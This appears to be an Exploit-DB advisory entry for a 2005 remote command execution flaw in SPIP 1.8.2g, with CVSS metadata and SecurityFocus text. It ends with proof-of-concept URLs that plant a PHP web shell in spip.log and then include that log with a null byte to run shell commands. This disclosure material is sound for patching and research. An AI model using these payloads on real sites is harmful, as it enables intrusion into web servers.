SPIP Remote Command Execution Vulnerability

vendor:

SPIP

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Command Execution

CWE

Product Name: SPIP

Affected Version From: 1.8.2g

Affected Version To: 1.8.2g

Patch Exists: YES

Related CWE: N/A

CPE: a:spip:spip

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

SPIP Remote Command Execution Vulnerability

SPIP is prone to a remote command-execution vulnerability due to a lack of proper sanitization of user-supplied input. An attacker can exploit this issue to execute arbitrary remote PHP commands on an affected computer with the privileges of the webserver process. Successful exploitation could facilitate unauthorized access; other attacks are also possible.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16556/info

SPIP is prone to a remote command-execution vulnerability. This is due to a lack of proper sanitization of user-supplied input.

An attacker can exploit this issue to execute arbitrary remote PHP commands on an affected computer with the privileges of the webserver process.

Successful exploitation could facilitate unauthorized access; other attacks are also possible.

Version 1.8.2g and earlier are vulnerable; other versions may also be affected.

http://www.example.com/spip_rss.php?GLOBALS[type_urls]=/../ecrire/data/spip.log%00

http://www.example.com/spip_acces_doc.php3?id_document=0&file=<?system($_GET[cmd]);?>
http://www.example.com/spip_rss.php?cmd=ls%20-la&GLOBALS[type_urls]=/../ecrire/data/spip.log%00